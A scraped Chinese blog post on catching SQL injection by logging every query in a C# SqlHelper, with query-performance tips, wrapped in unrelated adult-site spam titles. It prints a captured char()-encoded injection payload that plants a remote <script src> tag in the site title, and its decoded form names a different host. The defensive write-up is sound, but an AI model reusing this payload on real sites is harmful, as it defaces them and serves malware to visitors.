成人性生交大片免费看视频r_亚洲综合极品香蕉久久网_在线视频免费观看一区_亚洲精品亚洲人成人网在线播放_国产精品毛片av_久久久久国产精品www_亚洲国产一区二区三区在线播_日韩一区二区三区四区区区_亚洲精品国产无套在线观_国产免费www

主頁 > 知識庫 > 記一次成功的sql注入入侵檢測附帶sql性能優(yōu)化

記一次成功的sql注入入侵檢測附帶sql性能優(yōu)化

熱門標簽:陜西電銷外呼系統(tǒng)好用嗎 蘭州語音外呼系統(tǒng)運營商 銀川高頻外呼回撥系統(tǒng)多少錢 最新人工智能電銷機器人 數(shù)字匠心電銷機器人 成都電話外呼系統(tǒng)一般多少錢 沒聽見電話機器人幫你接 al智能電話機器人 如何做地圖標注圖鋪
但是如果是讓你接手一個二等殘廢的網(wǎng)站,并讓你在上面改版,而且不能推翻式改版,只能逐步替換舊的程序,那么你會非常痛苦,例如我遇到的問題:
問題1.
老板對你說,以前剛做完網(wǎng)站好好了,沒有出現(xiàn)木馬,怎么你來了,就會出現(xiàn)木馬,先別說了,趕緊解決問題,我徹底無語,但是如果爭吵,其實證明你和老板一樣無知,拿出證據(jù)和事實分析來讓公司其他稍微懂技術的一起來證明,公司網(wǎng)站被掛馬不是你來了的錯。
如是我通過網(wǎng)站目錄仔細排查將通過fck上傳的網(wǎng)馬刪除并修補fck的上傳漏洞并記下了這篇 Fckeditor使用筆記 ,其實很多人都遇到過,也解決過,都是小問題,但是讓你老板明白比解決漏洞問題更蛋疼,我那解釋的叫一個汗啊,恨不得把公司所有稍微懂點技術的都叫上讓他們看什么是大馬什么是小馬,然后演示怎么上傳木馬,奶奶的,黑客教程普及啊。
問題2.
網(wǎng)站又出現(xiàn)問題,上次的問題解決了不過兩個月,網(wǎng)站又被入侵掛馬,如是老板這次再說因為我來了才出問題,立馬走人,這就是為什么不能更不懂技術的人硬碰硬,更不能和你的老板來說,說了你又不懂。
但是要命的是網(wǎng)站是以前的技術開發(fā)的二等殘廢,在別個的cms上修改的,我必須保證網(wǎng)站在的開發(fā)的同時舊的模塊還可以使用,通過逐步更新的方法將網(wǎng)站底層翻新,但是那么多頁面,你很難一個一個去檢測那個頁面有漏洞,如是寫出下面的檢測代碼,沒想到這么簡單的就搞定了,并且可以通過此方法優(yōu)化你的sql。
第一步建立一個sql日志表
復制代碼 代碼如下:

CREATE TABLE [dbo].[my_sqllog](
[id] [bigint] IDENTITY(1,1) NOT NULL,
[hit] [bigint] NULL,
[sqltext] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[paramdetails] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[begintime] [datetime] NULL,
[endtime] [datetime] NULL,
[fromurl] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[ip] [varchar](20) COLLATE Chinese_PRC_CI_AS NULL,
[lastelapsedtime] [bigint] NULL,
CONSTRAINT [PK_my_sqllog] PRIMARY KEY CLUSTERED
(
[id] ASC
)WITH (IGNORE_DUP_KEY = OFF) ON [PRIMARY]
) ON [PRIMARY]

記錄sql語句、此sql語句被執(zhí)行次數(shù),參數(shù)及值,記錄開始時間,結(jié)束時間,來自哪個頁面,ip和此條語句執(zhí)行時間(暫時沒用)
第二步在sqlhelper里寫記錄代碼
兩個方法本來可以寫成private的,但是此二等殘廢的網(wǎng)站其他地方用的別的sqlhelper類,就直接調(diào)用此處通過合理優(yōu)化的sqlhelper類的方法了。
代碼1:插入日志
復制代碼 代碼如下:

public static int ExecuteSqlLog(CommandType commandType, string commandText, params DbParameter[] cmdParams)
{
#region 參數(shù)處理
string colums = "";
string dbtypes = "";
string values = "";
string paramdetails = "";
if (cmdParams != null cmdParams.Length > 0)
{
foreach (DbParameter param in cmdParams)
{
if (param == null)
{
continue;
}
colums += param.ParameterName + " ";
dbtypes += param.DbType + " ";
values += param.Value + ";";
}
paramdetails = string.Format(" {0},{1},{2}", colums, dbtypes, values);
}
string fromurl = "";
if (System.Web.HttpContext.Current!=null)
{
fromurl = System.Web.HttpContext.Current.Request.Url.ToString();
}
// commandText = commandText.Replace("'","‘").Replace(";",";");
SqlParameter[] parameters = new SqlParameter[]
{
new SqlParameter("@hit",1),
new SqlParameter("@sqltext",commandText),
new SqlParameter("@paramdetails",paramdetails),
new SqlParameter("@begintime",DateTime.Now),
new SqlParameter("@endtime",DateTime.Now),
new SqlParameter("@fromurl",fromurl),
new SqlParameter("@ip",Web.PressRequest.GetIP()),
new SqlParameter("@lastelapsedtime",0),
};
#endregion
using (DbConnection connection = Factory.CreateConnection())
{
connection.ConnectionString = GetRealConnectionString(commandText);//ConnectionString;
string sql = "";
// 執(zhí)行DbCommand命令,并返回結(jié)果.
int id =
Utils.TypeConverter.ObjectToInt(ExecuteScalarLog(CommandType.Text,
"select top 1 id from my_sqllog where sqltext=@sqltext",
new SqlParameter("@sqltext", commandText)));
if (id > 0)
{
sql = "update my_sqllog set hit=hit+1,ip=@ip,endtime=@endtime,fromurl=@fromurl where id=" + id;
}
else
{
sql = "insert into my_sqllog(hit,sqltext,paramdetails,begintime,endtime,fromurl,ip,lastelapsedtime) values(@hit,@sqltext,@paramdetails,@begintime,@endtime,@fromurl,@ip,@lastelapsedtime)";
}
// 創(chuàng)建DbCommand命令,并進行預處理
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, sql, parameters, out mustCloseConnection);
// 執(zhí)行DbCommand命令,并返回結(jié)果.
int retval = cmd.ExecuteNonQuery();
// 清除參數(shù),以便再次使用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}
}

代碼2:判斷此條sql是否存在
復制代碼 代碼如下:

private static object ExecuteScalarLog( CommandType commandType, string commandText, params DbParameter[] commandParameters)
{
if (ConnectionString == null || ConnectionString.Length == 0) throw new ArgumentNullException("ConnectionString");
// 創(chuàng)建并打開數(shù)據(jù)庫連接對象,操作完成釋放對象.
using (DbConnection connection = Factory.CreateConnection())
{
if (connection == null) throw new ArgumentNullException("connection");
//connection.Close();
connection.ConnectionString = GetRealConnectionString(commandText);
connection.Open();
// 創(chuàng)建DbCommand命令,并進行預處理
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, commandText, commandParameters, out mustCloseConnection);
// 執(zhí)行DbCommand命令,并返回結(jié)果.
object retval = cmd.ExecuteScalar();
// 清除參數(shù),以便再次使用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}
}

第三部在你的每個執(zhí)行sql語句的方法里加入以下代碼,不管是ExecuteScalar、ExecuteReader還是ExecuteNonQuery等等都加上
復制代碼 代碼如下:

//執(zhí)行sql之前進行日志記錄操縱
int log = ExecuteSqlLog(CommandType.Text, commandText, commandParameters);

代碼示例:
復制代碼 代碼如下:

public static object ExecuteScalar(DbConnection connection, CommandType commandType, string commandText, params DbParameter[] commandParameters)
{
if (connection == null) throw new ArgumentNullException("connection");
//connection.Close();
connection.ConnectionString = GetRealConnectionString(commandText);
connection.Open();
// 創(chuàng)建DbCommand命令,并進行預處理
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, commandText, commandParameters, out mustCloseConnection);
//執(zhí)行sql之前進行日志記錄操縱
int log = ExecuteSqlLog(CommandType.Text, commandText, commandParameters);
// 執(zhí)行DbCommand命令,并返回結(jié)果.
object retval = cmd.ExecuteScalar();
// 清除參數(shù),以便再次使用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}

然后你會發(fā)現(xiàn)入侵的入口被記錄下來了,后面方框里的就是構(gòu)造注入的sql

構(gòu)造sql如下:

39191+update+my_websetting+set+websitetitle=REPLACE(cast(websitetitle+as+varchar(8000)),cast(char(60)+char(47)+char(116)+char(105)+char(116)+char(108)+char(101)+char(62)+char(60)+char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(32)+char(115)+char(114)+char(99)+char(61)+char(104)+char(116)+char(116)+char(112)+char(58)+char(47)+char(47)+char(100)+char(102)+char(114)+char(103)+char(99)+char(99)+char(46)+char(99)+char(111)+char(109)+char(47)+char(117)+char(114)+char(46)+char(112)+char(104)+char(112)+char(62)+char(60)+char(47)+char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
轉(zhuǎn)碼后變成這樣了:  

update my_websetting set websitetitle=REPLACE(cast(websitetitle as varchar(8000)),websitetitle+'/title>script src=http://jb51.net/ur.php>/script>')
這個就是木馬地址,沒事你就別點了,好奇害死貓。

小結(jié):
既然知道入口就知道怎么補救了吧,把string類型該過濾的都過濾掉,int類型的就得是int類型,別讓數(shù)據(jù)庫替你隱式轉(zhuǎn)。通過此sql日志記錄,你應該發(fā)現(xiàn)一點那個hit還是有點價值的。
通過select top 100 * from my_sqllog order by hit desc
你會發(fā)現(xiàn)你寫的那么多sql原來真垃圾,在條件允許的情況下干嘛不把它放到緩存里。所以后來我寫的sql基本不在這top 100里。
拋磚引玉,望高手批評,以上入侵方法希望剛學習做程序員的同學不要用來欺負小網(wǎng)站,傷不起。
作者:jqbird

標簽:巴彥淖爾 宜春 鹽城 通化 遼源 邢臺 朔州 本溪

巨人網(wǎng)絡通訊聲明:本文標題《記一次成功的sql注入入侵檢測附帶sql性能優(yōu)化》,本文關鍵詞  記,一次,成功,的,sql,注入,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡,涉及言論、版權(quán)與本站無關。
  • 相關文章
  • 下面列出與本文章《記一次成功的sql注入入侵檢測附帶sql性能優(yōu)化》相關的同類信息!
  • 本頁收集關于記一次成功的sql注入入侵檢測附帶sql性能優(yōu)化的相關信息資訊供網(wǎng)民參考!
  • 推薦文章
    午夜精品一区二区三区电影天堂| 欧美性生活大片免费观看网址| 国产高清精品一区二区三区| 国内精品久久久久久久久| 美女在线免费视频| 一区中文字幕| 成人国产1314www色视频| 国产69精品久久久久久久| 欧美午夜免费电影| 高清欧美一区二区三区| 国产欧美在线一区| 欧美国产日产韩国视频| 欧美三级 欧美一级| 久久久久久av无码免费看大片| 99精品热6080yy久久| 啪啪免费视频一区| 国产爆乳无码一区二区麻豆| 国产精品激情av电影在线观看| 成人午夜视频在线观看| 久久人体av| 悠悠资源网久久精品| 精品久久久久久乱码天堂| 天堂视频免费在线观看| 欧美大片在线播放| 奇米影视888狠狠狠777不卡| 男人添女人荫蒂国产| 成人性视频免费看| 国产在线视视频有精品| 中文字幕在线视频久| 无码人妻丰满熟妇精品| 国产精品久久久久久久久久久久冷| 国产一区二区亚洲| 91精品久久久久久久久久久久久久| 一区二区日韩视频| 男人天堂avav| 久草这里只有精品视频| 中文字幕一区二区人妻视频| 悠悠色在线精品| 欧美丰满少妇xxxxx做受| 亚洲高清福利| 国产做受高潮漫动| 日本成人一区| 久久不见久久见免费视频7| 亚洲日本精品国产第一区| 黄网站免费在线观看| 国产成人自拍网| 日韩成人在线看| 欧美在线观看视频网站| 国产美女18xxxx免费视频| 日韩成人精品一区二区三区| 日韩女优制服丝袜电影| 国产精品嫩草69影院| 欧美xxx在线观看| 可以在线看的av网站| 播播国产欧美激情| 国产精品久久国产精品| 亚洲欧美二区三区| 久久品道一品道久久精品| 亚洲黄色录像| 国产精品综合久久| 秋霞av一区二区三区| 91麻豆蜜桃一区二区三区| 中文字幕一区二区三区5566| 天堂√在线观看一区二区| 日本精品一区二区三区四区| 国产精品少妇在线视频| 欧美亚洲日本在线| 中文娱乐网av| 亚洲乱码精品| 360天大佬第二季在线观看| 99热99这里只有精品| 亚洲激情视频网站| 毛片av一区二区| 成人午夜黄色影院| 国产精品视频首页| 超碰在线播放91| 日韩av免费播放| 国产日韩欧美亚洲一区| 欧美一区二区视频网站| 欧美久久成人| 精品久久一区二区三区蜜桃| 亚洲欧美日韩天堂| av不卡免费电影| 欧美日韩精品是欧美日韩精品| 久久精品成人欧美大片免费| caoporn国产一区二区| 国产69精品久久777的优势| 一区二区三区免费在线观看视频| 一区二区在线观看免费视频| 国产九九在线| 日韩中文字幕视频在线观看| 97人人做人人人难人人做| 色综合91久久精品中文字幕| 希岛爱理一区二区三区av高清| 尤物视频在线观看视频| 国产一二三四区在线| 992kp免费看片| 国产精品一区二区三区在线播放| 亚洲五码中文字幕| 懂色av蜜臀av粉嫩av喷吹| 久久精品成人欧美大片古装| 给我免费播放日韩视频| 精品国产91亚洲一区二区三区www| 久草福利资源站| 香港经典三级在线| 免费网站在线观看视频| 91精品国产综合久久精品性色| 久久久久久久久四区三区| 欧美女同网站| 一级淫片在线观看| 久久艹精品视频| 精品国产乱码久久久久久蜜臀网站| 精品亚洲男同gayvideo网站| 久久一区二区电影| 国产精品对白刺激久久久| 欧美日产国产精品| 韩国中文字幕2020精品| 亚洲最大的免费视频网站| 中文字幕中文字幕中文字幕亚洲无线| 污片在线免费看| 久久99久久人婷婷精品综合| av在线国产精品| 欧美日韩综合一区二区| 亚洲午夜精品久久久久久久久久久久| 亚洲精品一二三四| 久久6精品影院| 污污的网站在线观看| 国产精品久久久久9999| 欧美精选在线| 嫩草一区二区三区| 天天射夜夜骑| 国产精品㊣新片速递bt| www..com.cn蕾丝视频在线观看免费版| 国产又粗又大又爽视频| 国产免费无码一区二区视频| 激情六月婷婷| 欧美激情影院| 亚洲欧美日韩国产一区二区三区| 日韩av免费在线播放| 国产成人免费av一区二区午夜| 国产高清在线不卡| 免费看黄视频网站| 欧美sm精品调教视频| 色一情一乱一伦一区二区三区丨| 久久精品理论片| 日产日韩在线亚洲欧美| 2020国产在线视频| 欧美午夜影院| 国产一区二区在线免费视频| 久久av在线| 成人国产精品av| 亚洲二区在线观看| 欧美尺度大的性做爰视频| 国产亚洲美女久久| 国产激情视频在线看| 999精品视频一区二区三区| 亚洲精品视频久久| 亚洲欧美色综合| 91成品视频入口| 国产一区二区三区美女| ass极品国模人体欣赏| 久久蜜桃精品| 久久精品视频在线观看免费| 久久永久免费| 国内精品写真在线观看| 97成人超碰免| 天天操天天干天天| jlzzjlzz亚洲女人| 国产成人午夜性a一级毛片| 精品国产人成亚洲区| 在线观看av一区二区| 国产欧美日韩另类| 国产成人小视频在线观看| 欧美日韩中文字幕| 国产视频一区免费看| 爱情岛论坛亚洲入口| 无码国产精品一区二区色情男同| 久久久久99精品成人| 国产精品一卡二| 久久精品国产成人精品| av免费在线免费观看| 国产精品久久久久毛片软件| 香蕉久久免费电影| 久久久av毛片精品| 9.1国产丝袜在线观看| 91美女福利视频| 日韩成人xxxx| 都市激情久久久久久久久久久| 国产精品裸体一区二区三区| 成人福利在线观看视频| 8x海外华人永久免费日韩内陆视频| 国产va亚洲va在线va| 日本天堂免费a| 欧美日韩一区二区三区在线电影| 中文字幕视频在线免费欧美日韩综合在线看| 午夜免费一区二区| 日韩有码在线视频| www.成人在线观看| 欧美精品一区二区三区在线看午夜| 国产欧美久久久精品影院| 国产91亚洲精品| 在线色欧美三级视频| 欧美电视剧在线看免费| 在线观看国产91| 国产精品jizz| 99精品国产视频| 天天色天天操天天射| 日韩一区网站| 久久噜噜亚洲综合| 最新中文乱码字字幕在线| 巨大黑人video| 久久亚洲精品小早川怜子| 亚洲视频免费| 午夜视频在线观看一区二区三区| 一区二区三区四区在线免费观看| 欧美丝袜美腿| 日韩欧美一区二| 欧美寡妇性猛交xxx免费| 国产一级久久久久毛片精品| 亚洲精选中文字幕| 久久久久国产精品熟女影院| 69看片网站| 日韩在线观看| 三级网站视频在在线播放| www日韩中文字幕在线看| 好吊色视频988gao在线观看| 国产激情自拍视频| 亚洲黄色网址在线观看| 久久精品免视着国产成人| 思思99精品视频在线观看| 女人18毛片毛片毛片毛片区二| 日本一区免费观看| 欧美区一区二区三区| 黄色资源在线看| 香蕉久久成人网| 国产精品丝袜视频| 亚洲婷婷丁香| av福利精品导航| 91精品一区国产高清在线gif| 欧美一区二区视频在线观看| 欧美高清你懂得| 疯狂做受xxxx高潮欧美日本| 国产亚洲女人久久久久毛片| 国产精品入口芒果| 福利片在线免费观看| 午夜精品福利一区二区三区av| 成 年 人 黄 色 大 片大 全| 日韩av手机在线播放| 中文字幕乱码日本亚洲一区二区| 亚洲国产mv| 亚洲日本va午夜在线影院| 欧美日韩精品亚洲精品| 国产国产人免费人成免费视频| 手机在线观看免费av| 久久精品视频免费在线观看| 欧美三级精品| 日韩精品中文字幕在线一区| 日韩免费电影一区二区| 制服丝袜在线一区| 激情小说亚洲色图| 亚洲精品性视频| 国产伦精品一区二区三区视频孕妇| 嫩草影院懂你的影院| 国产精品视频你懂的| 亚洲国产又黄又爽女人高潮的| 国产免费拔擦拔擦8x高清在线人| 久久综合免费视频影院| 成年人黄视频在线观看| 日本www在线观看| 国产精品专区免费| 国产高清一区| 在线观看小视频| 一道本在线免费视频| 色哺乳xxxxhd奶水米仓惠香| 午夜激情一区二区| 亚洲日本aⅴ片在线观看香蕉| 欧美国产精品一区二区三区| 亚洲国产高潮在线观看| 日韩av一区二区三区| 国产精品中文欧美| 久久99国产精品免费| 欧美性猛交xxxx免费看蜜桃| 午夜av在线免费观看| 欧美成人三级电影在线| 欧美视频在线一区| 亚洲一二三区在线| www操com| 99久久er热在这里只有精品66| 亚洲a在线视频| 国产农村妇女精品久久| 18视频在线观看| 国产激情偷乱视频一区二区三区| 先锋在线亚洲| 日韩成人免费在线观看| 色综合视频一区二区三区44| 免费在线日本| 欧美一区二区三区婷婷| 美女性感视频久久久| 香蕉国产精品偷在线观看不卡| 天天噜夜夜操| 色噜噜亚洲精品中文字幕| 777琪琪电影午夜理伦片| www黄视频| 亚洲国产婷婷综合在线精品| 国产一区二区三区在线观看| 激情综合网俺也去| 亚洲国产一区二区三区在线播放| 国产69精品久久777的优势| 永久免费精品影视网站| 欧美1区免费| 高潮无码精品色欲av午夜福利| 欧美精品一区二区三区高清aⅴ| 91视频观看| 欧美日韩亚洲精品一区二区三区| 欧美不卡在线视频| 97影院理论片在线播放| 北条麻妃99精品青青久久| 国产91视觉| 青青青在线播放| 久久久av毛片精品| a级国产乱理论片在线观看99| 91免费版网站入口| 午夜精品久久久久久| 国产精品视频永久免费播放| 国产亚洲精品精品精品| 亚洲精品视频在线| 国产精品99免费看| 日韩深夜影院|